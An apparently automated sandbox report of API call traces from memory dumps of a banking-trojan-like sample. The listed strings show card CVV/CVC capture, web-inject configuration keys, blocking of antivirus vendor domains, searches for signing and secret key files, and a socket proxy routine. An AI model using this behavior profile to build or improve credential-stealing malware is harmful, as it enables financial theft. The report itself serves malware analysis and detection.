                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 02BD410C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4137
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD4197
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C,?,00000000), ref: 02BD41D7
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD4237
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4297
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$ErrorLast_snprintf$AdminAttributesCreateDirectoryFileFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                            • API String ID: 2433436401-604994656
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BBDA2D
                                                                                                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02BBDA3E
                                                                                                                                                                                                              • Part of subcall function 02BBD970: GetComputerNameA.KERNEL32(02BFF588,?), ref: 02BBD987
                                                                                                                                                                                                              • Part of subcall function 02BBD970: lstrlenA.KERNEL32(02BFF588,?,?,02BC76EC), ref: 02BBD992
                                                                                                                                                                                                              • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9D2
                                                                                                                                                                                                              • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9E2
                                                                                                                                                                                                              • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9F2
                                                                                                                                                                                                              • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9FF
                                                                                                                                                                                                              • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBDA0C
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02BFF5A0), ref: 02BBDA6A
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDA83
                                                                                                                                                                                                              • Part of subcall function 02BB9020: SetThreadDesktop.USER32(?,76F8F590,76F816B0,?), ref: 02BB902F
                                                                                                                                                                                                              • Part of subcall function 02BB9020: GetDC.USER32(00000000), ref: 02BB9037
                                                                                                                                                                                                              • Part of subcall function 02BB9020: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02BB9048
                                                                                                                                                                                                              • Part of subcall function 02BB9020: GetDeviceCaps.GDI32(00000000,00000008), ref: 02BB9059
                                                                                                                                                                                                              • Part of subcall function 02BB9020: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02BB9070
                                                                                                                                                                                                              • Part of subcall function 02BB9020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02BB90B2
                                                                                                                                                                                                              • Part of subcall function 02BB9020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02BB90C2
                                                                                                                                                                                                              • Part of subcall function 02BB9020: DeleteObject.GDI32(00000000), ref: 02BB90C5
                                                                                                                                                                                                              • Part of subcall function 02BB9020: ReleaseDC.USER32(00000000,00000000), ref: 02BB90CE
                                                                                                                                                                                                              • Part of subcall function 02BB9020: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB9129
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02BFF54C), ref: 02BBDAB0
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDAC3
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,02BFF670), ref: 02BBDAE1
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BBDAFF
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 02BBDB20
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(02BFF670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BBDB3D
                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 02BBDB47
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BBDB61
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,02BFF630), ref: 02BBDB79
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BBDB97
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000000,?), ref: 02BBDBB8
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(02BFF630,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BBDBD5
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 02BBDBDF
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BBDBFD
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BBDC10
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BBDC23
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,02BFF5DC), ref: 02BBDC39
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                              • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                              • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                              • Part of subcall function 02BD5930: FindCloseChangeNotification.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$Security$Descriptor$wsprintf$EventFile$FreeMutexThreadToken$BitsCapsConvertCurrentDeviceHeapInfoLocalMappingNamedOpenProcessSaclStringView$AdjustBitmapChangeCloseCompatibleComputerCountDeleteDesktopErrorFindLastLookupNameNotificationObjectPrivilegePrivilegesReleaseTickValuelstrlen
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 3490689938-820036962
                                                                                                                                                                                                            • Opcode ID: 42ac57b92071214429b01ef6dbb1e150c22055e3cff6698e8fa3ff40fe6745af
                                                                                                                                                                                                            • Instruction ID: df667d3627288c3f3d38006f7ae830320e32ece895f1b270dee6159822760511
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42ac57b92071214429b01ef6dbb1e150c22055e3cff6698e8fa3ff40fe6745af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F517B71FC0306BAF7719BA49C86FAA77A8AF44B41F104585B701EB2C0DBF4A5108F65
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,76F8F380,00000000,00000001,00000000,?,?,?,02BC8A44,?,?,?,?,?), ref: 02BCE433
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE441
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE44D
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE45B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE467
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE479
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BCE48F
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BCE4A2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02BCE50B
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02BCE512
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCE522
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCE580,00000000,00000000,00000000), ref: 02BCE548
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCE560
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCE571
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                            • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                            • API String ID: 1632825432-2817208116
                                                                                                                                                                                                            • Opcode ID: 2d47b643c78aeb60bf16da58e376c2c21393b2149405fda625538a2135f564df
                                                                                                                                                                                                            • Instruction ID: 6c05d480452d44691725d6c1e443c69198a0d7adebbaa025fa44fb1d99e5c30a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d47b643c78aeb60bf16da58e376c2c21393b2149405fda625538a2135f564df
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA416831A40B11AFE3220A386C59FAF279DCF45745F7842D8FA84E7252EB61D61983A4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02BC9B39
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC9B42
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02BC9B4C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC9B4F
                                                                                                                                                                                                            • recv.WS2_32(?,?,?,00000000), ref: 02BC9B75
                                                                                                                                                                                                            • send.WS2_32(?,02BF9E4C,00000002,00000000), ref: 02BC9BCC
                                                                                                                                                                                                            • send.WS2_32(?,02BFE1CC,00000002,00000000), ref: 02BC9BF2
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000004,00000000), ref: 02BC9C18
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000001,00000000), ref: 02BC9C92
                                                                                                                                                                                                            • gethostbyname.WS2_32(00000005), ref: 02BC9CC7
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000002,00000000), ref: 02BC9D0D
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000004,00000000), ref: 02BC9D24
                                                                                                                                                                                                            • inet_ntoa.WS2_32(?), ref: 02BC9D37
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000002,00000000), ref: 02BC9D47
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02BC9D5A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000005), ref: 02BC9D67
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC9D6E
                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 02BC9D7A
                                                                                                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 02BC9D9C
                                                                                                                                                                                                            • send.WS2_32(?,?,0000000A,00000000), ref: 02BC9DB6
                                                                                                                                                                                                            • send.WS2_32(?,?,0000000A,00000000), ref: 02BC9DD0
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC9970,?,00000000,00000000), ref: 02BC9DEA
                                                                                                                                                                                                            • recv.WS2_32(?,?,?,00000000), ref: 02BC9CBC
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: shutdown.WS2_32(?,00000001), ref: 02BC990B
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: shutdown.WS2_32(02BC99EC,00000001), ref: 02BC9910
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: recv.WS2_32(02BC99EC,?,00000400,00000000), ref: 02BC992F
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: recv.WS2_32(?,?,00000400,00000000), ref: 02BC9945
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: closesocket.WS2_32(?), ref: 02BC9959
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: closesocket.WS2_32(02BC99EC), ref: 02BC995C
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: ExitThread.KERNEL32 ref: 02BC9960
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC9DFC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: recv$Heap$send$Process$AllocThreadclosesocketshutdown$CloseCreateExitFreeHandleconnectgethostbynamehtonsinet_ntoasocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 699211285-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,avast.com,?,?,02BB62EC), ref: 02BB61CB
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,kaspersky,?,?,02BB62EC), ref: 02BB61DB
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,drweb,?,?,02BB62EC), ref: 02BB61E7
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,eset.com,?,?,02BB62EC), ref: 02BB61F3
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,antivir,?,?,02BB62EC), ref: 02BB61FF
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,avira,?,?,02BB62EC), ref: 02BB620B
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,virustotal,?,?,02BB62EC), ref: 02BB6217
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,virusinfo,?,?,02BB62EC), ref: 02BB6223
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,z-oleg.com,?,?,02BB62EC), ref: 02BB622F
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,trendsecure,?,?,02BB62EC), ref: 02BB623B
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,anti-malware,?,?,02BB62EC), ref: 02BB6247
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,.comodo.com,?,?,02BB62EC), ref: 02BB6253
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                            • API String ID: 0-375433535
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,avast.com,?,?,02BB62AC), ref: 02BB611B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kaspersky,?,?,02BB62AC), ref: 02BB612B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,drweb,?,?,02BB62AC), ref: 02BB6137
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,eset.com,?,?,02BB62AC), ref: 02BB6143
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,antivir,?,?,02BB62AC), ref: 02BB614F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,avira,?,?,02BB62AC), ref: 02BB615B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,virustotal,?,?,02BB62AC), ref: 02BB6167
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,virusinfo,?,?,02BB62AC), ref: 02BB6173
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,z-oleg.com,?,?,02BB62AC), ref: 02BB617F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,trendsecure,?,?,02BB62AC), ref: 02BB618B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,anti-malware,?,?,02BB62AC), ref: 02BB6197
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,.comodo.com,?,?,02BB62AC), ref: 02BB61A3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                            • API String ID: 0-375433535
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02BB148C,00000000,?), ref: 02BB101B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013,76F8F570,?,02BB148C,00000000,?), ref: 02BB103E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB1045
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB1055
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,76F8F570,?,02BB148C,00000000,?), ref: 02BB1073
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02BB148C,00000000,?), ref: 02BB1093
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD0810,00000000,00000000,00000000), ref: 02BB10B9
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,\secrets.key,?,02BB148C,00000000,?), ref: 02BB10D5
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD20D0,00000000,00000000,00000000), ref: 02BB10E5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,sign.key,?,02BB148C,00000000,?), ref: 02BB10FD
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD2BB0,00000000,00000000,00000000), ref: 02BB1116
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,02BB148C,00000000,?), ref: 02BB112A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB113B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02BB148C,00000000,?), ref: 02BB1150
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB1153
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02BB148C,00000000,?), ref: 02BB115F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB1162
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                            • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                            • API String ID: 3254303593-2345338882
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,?,76A8DB30), ref: 00403060
                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                              • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                              • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                              • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                            • String ID: cmd.exe
                                                                                                                                                                                                            • API String ID: 2839743307-723907552
                                                                                                                                                                                                            • Opcode ID: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                            • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02BFFB20,00000000,00000000,00000000,?,02BC1A39), ref: 02BC1330
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000020,?,02BC1A39), ref: 02BC1398
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02BC1A39), ref: 02BC139F
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC141F
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC1439
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC1453
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC146D
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC1497
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000020), ref: 02BC14B4
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC14BB
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC15E4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC161C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC161F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC162C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC162F
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB20,?,02BC1A39), ref: 02BC163A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                            • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                            • API String ID: 2387113551-2328515424
                                                                                                                                                                                                            • Opcode ID: 25ad26229560573ab04331fa448130a095fa6d6a71a835bc903d8b6be9739cdd
                                                                                                                                                                                                            • Instruction ID: 175eff3abbedf8bcc87e91a6b51b60f50b498e2faab170de4acc5268710be294
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25ad26229560573ab04331fa448130a095fa6d6a71a835bc903d8b6be9739cdd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EA1CE71A047019FDB21CF3884987A67FE1EF45348F2885EDD98A9B643EB71D609CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BBDF80: GetDesktopWindow.USER32 ref: 02BBDF8E
                                                                                                                                                                                                              • Part of subcall function 02BBDF80: RealChildWindowFromPoint.USER32(00000000,?,02BBE016,?,02BBA857,?,76F930D0,?), ref: 02BBDF95
                                                                                                                                                                                                              • Part of subcall function 02BBDF80: IsWindowVisible.USER32(00000000), ref: 02BBDFC1
                                                                                                                                                                                                              • Part of subcall function 02BBDF80: GetParent.USER32(00000000), ref: 02BBDFC8
                                                                                                                                                                                                              • Part of subcall function 02BBDF80: GetWindowLongA.USER32(00000000,000000EC), ref: 02BBDFD3
